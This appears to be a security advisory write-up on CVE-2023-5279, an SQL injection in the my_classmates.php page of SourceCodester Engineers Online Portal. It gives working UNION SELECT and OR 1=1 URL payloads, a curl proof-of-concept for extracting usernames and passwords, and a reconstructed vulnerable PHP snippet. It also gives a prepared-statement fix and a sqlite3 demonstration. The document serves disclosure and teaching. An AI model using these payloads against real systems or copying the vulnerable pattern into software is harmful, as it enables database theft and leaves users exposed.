CVE-2023-5279 - Critical SQL Injection in SourceCodester Engineers Online Portal 1. (my_classmates.php)

Published: June 2024 (the CVE record itself was published 29 September 2023; see Timeline below)
Vulnerability Type: SQL Injection
Reference: VDB-240907
Software Affected: SourceCodester Engineers Online Portal 1.
File Impacted: my_classmates.php
Attack Vector: Remote

Introduction

A serious security flaw, tracked as CVE-2023-5279, has been disclosed in version 1. of SourceCodester's Engineers Online Portal. It is rated critical and allows a remote attacker to perform SQL injection through the teacher_class_student_id parameter of my_classmates.php, which is used in a database query without validation. Because the injection point is a single GET parameter, exploitation needs nothing more than a crafted URL, and a successful attack can read or modify database contents and, depending on the privileges of the database account, reach further into the server.

What is SQL Injection?

SQL Injection is an attack in which attacker-controlled input is placed into an SQL statement in a way that changes the statement's structure, so the database runs a query the application never intended. Depending on the query and the database privileges involved, this can let an attacker read data they should not see, or modify or delete it.

Where is the Vulnerability?

The weakness lies in how the teacher_class_student_id GET parameter is used in my_classmates.php. The value is not validated or parameterised before it reaches the database, so user-supplied input can alter the SQL query rather than just the value it compares against.

The exact vulnerable source is not quoted in the advisory; the following is a reconstruction in PHP of the pattern it describes (connection details are placeholders)

// my_classmates.php (reconstructed vulnerable pattern, not the project's verbatim code)
$conn = mysqli_connect('localhost', 'dbuser', 'dbpass', 'portal'); // placeholder credentials
// The raw request parameter: no integer cast, no validation
$id = $_GET['teacher_class_student_id'];
// The value is concatenated straight into the SQL text, so it can change the query's structure
$query = "SELECT * FROM classmates WHERE teacher_class_student_id = $id";
$result = mysqli_query($conn, $query);

Notice: $id is taken directly from the request and concatenated into the query string without any validation, cast or parameter binding, so anything the attacker puts after the number becomes part of the SQL.

How Can an Attacker Exploit This?

An attacker can supply a specially-crafted value for teacher_class_student_id that rewrites the query, for example to make the WHERE clause match every row, or to append a UNION SELECT that reads from other tables. (mysqli_query runs a single statement, so stacked queries separated by semicolons are not available here; the attack works by reshaping the one query.)

Suppose a user visits

http://target.site/my_classmates.php?teacher_class_student_id=1

A hacker could change the URL to

http://target.site/my_classmates.php?teacher_class_student_id=1%20OR%201=1

The WHERE clause now reads teacher_class_student_id = 1 OR 1=1, which is true for every row, so the page may list all classmates rather than one, confirming that the parameter reaches the query unmodified.

Attacker changes the URL to

http://target.site/my_classmates.php?teacher_class_student_id=1%20UNION%20SELECT%201,username,password,4%20FROM%20users--%20

This could expose the username and password column contents in the page if the results of the classmates query are rendered. Two things must hold for the UNION to work: the number of selected columns must match the original query (the 4 here is illustrative; the real count can be found with ORDER BY n or UNION SELECT NULL,NULL,... until the error disappears), and the table and column names must exist (users, username and password are assumptions, not names taken from the advisory). Note the trailing %20: MySQL only treats -- as a comment when it is followed by whitespace, so --%20 or --+ is needed at the end of a URL payload.

Here’s a simple proof-of-concept using the common tool curl

curl "http://target.site/my_classmates.php?teacher_class_student_id=1%20UNION%20SELECT%201,username,password,4%20FROM%20users--%20"

If the page is vulnerable and the column count and table names are right, the HTTP response contains the username and password column values (plaintext or hashed, depending on how the application stores them) in place of classmate records.

How Bad Is It?

- Severity: Critical, as rated in the advisory.
- The advisory records no authentication requirement. Before treating the page as reachable without an account, confirm whether my_classmates.php enforces a login session in your deployment; if it does, the attacker needs at least a student account.
- Enables theft, tampering or destruction of sensitive information and, depending on the privileges of the database account the portal uses, possible escalation to the underlying server.

How to Fix

Developers:

- Never concatenate request parameters into SQL text; use prepared statements with bound parameters for every query that takes user input.
- Validate teacher_class_student_id as an integer before use and reject anything else with an error response.
- Run the portal's database user with the minimum privileges the application needs, so an injected query cannot read or write tables it should not.

Operators: check whether SourceCodester has published a fixed release; until the code is patched, restrict access to the portal or place it behind a web application firewall.

Example Fix

// Fix: validate the parameter as an integer, then bind it with a prepared statement
$raw = $_GET['teacher_class_student_id'] ?? '';
if (!ctype_digit($raw)) { exit('invalid teacher_class_student_id'); }
$id = (int) $raw;
$stmt = $conn->prepare('SELECT * FROM classmates WHERE teacher_class_student_id = ?');
$stmt->bind_param('i', $id); // 'i' binds an integer; the value is sent separately from the SQL text
$stmt->execute();
$result = $stmt->get_result();
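To make the exploit section and the fix above concrete side by side, here is an added Python/sqlite3 model of the my_classmates.php query. It is an example written for this write-up, not code from SourceCodester's Engineers Online Portal. The tables, columns and rows it creates (classmates, users, username, password, the three students and two accounts) are constructed for illustration, since the portal's real schema is not given in the advisory, and sqlite3 stands in for MySQL, so MySQL-specific behaviour such as the whitespace rule after -- is not modelled. It shows the 1 OR 1=1 and UNION payloads from the URLs above rewriting the concatenated query, and then that a bound parameter, with or without the integer check, cannot be turned into SQL.

```python
"""sqlite3 model of the my_classmates.php query: vulnerable vs. hardened.

Added example; not code from the Engineers Online Portal project. All
table, column and row names below are constructed for illustration.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlparse


def make_db() -> sqlite3.Connection:
    """In-memory database seeded with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE classmates (
            id INTEGER, teacher_class_student_id INTEGER,
            firstname TEXT, lastname TEXT);
        INSERT INTO classmates VALUES
            (1, 1, 'Ada', 'Lovelace'),
            (2, 2, 'Alan', 'Turing'),
            (3, 3, 'Grace', 'Hopper');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES
            (1, 'admin', 'hunter2'),
            (2, 'teacher1', 's3cret');
        """
    )
    return conn


def param_from_url(url: str) -> str:
    """Return the percent-decoded teacher_class_student_id value of a request URL."""
    return parse_qs(urlparse(url).query)["teacher_class_student_id"][0]


def vulnerable_lookup(conn: sqlite3.Connection, raw_param: str) -> list:
    """Mirrors the vulnerable PHP: the raw parameter is pasted into the SQL
    text, so it can rewrite the query (OR 1=1, UNION SELECT ... FROM users)."""
    query = "SELECT * FROM classmates WHERE teacher_class_student_id = " + raw_param
    return conn.execute(query).fetchall()


def bound_lookup(conn: sqlite3.Connection, raw_param: str) -> list:
    """Binding alone: the value travels as data, never as SQL text. A payload
    such as '1 OR 1=1' is compared as one string against the integer column
    and matches nothing; a plain '2' is compared as the number 2."""
    query = "SELECT * FROM classmates WHERE teacher_class_student_id = ?"
    return conn.execute(query, (raw_param,)).fetchall()


def validate_id(raw_param: str):
    """Integer validation, like the ctype_digit check in the PHP fix: returns
    the int for a plain decimal string, or None for anything else."""
    return int(raw_param) if re.fullmatch(r"[0-9]+", raw_param) else None


def hardened_lookup(conn: sqlite3.Connection, raw_param: str) -> list:
    """Mirrors the fix: reject non-integers, then bind the integer."""
    student_id = validate_id(raw_param)
    if student_id is None:
        return []  # the PHP version exits with an error response here
    query = "SELECT * FROM classmates WHERE teacher_class_student_id = ?"
    return conn.execute(query, (student_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    union_url = (
        "http://target.site/my_classmates.php?teacher_class_student_id="
        "1%20UNION%20SELECT%201,username,password,4%20FROM%20users--"
    )
    print("vulnerable, 1 OR 1=1 ->", vulnerable_lookup(db, "1 OR 1=1"))
    print("vulnerable, UNION    ->", vulnerable_lookup(db, param_from_url(union_url)))
    print("bound, 1 OR 1=1      ->", bound_lookup(db, "1 OR 1=1"))
    print("hardened, 3          ->", hardened_lookup(db, "3"))
```

Running it shows the concatenated query returning all three classmates for 1 OR 1=1 and the two constructed users rows for the UNION payload, while the bound versions return either the single matching row or nothing. The PHP fix keeps both layers on purpose: bind_param('i', ...) coerces whatever it is given to an integer, but the ctype_digit check lets the application reject malformed input explicitly instead of silently querying for a number the client never sent.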

References

- VulDB Entry VDB-240907: Sourcecodester Engineers Online Portal 1. SQL Injection
- Original Software on SourceCodester
- General: What is SQL Injection? (OWASP)

Conclusion

If you are running SourceCodester Engineers Online Portal 1., act now. The injection is reachable through a single crafted URL, so attackers can use it to read or alter your database. Apply a fix to my_classmates.php or an updated release immediately, and until then restrict access to the portal. Validate user input and use prepared statements with bound parameters rather than relying on escaping alone.

*Stay safe and protect your data!*

Timeline

Published on: 09/29/2023 18:15:10 UTC
Last modified on: 11/07/2023 04:23:46 UTC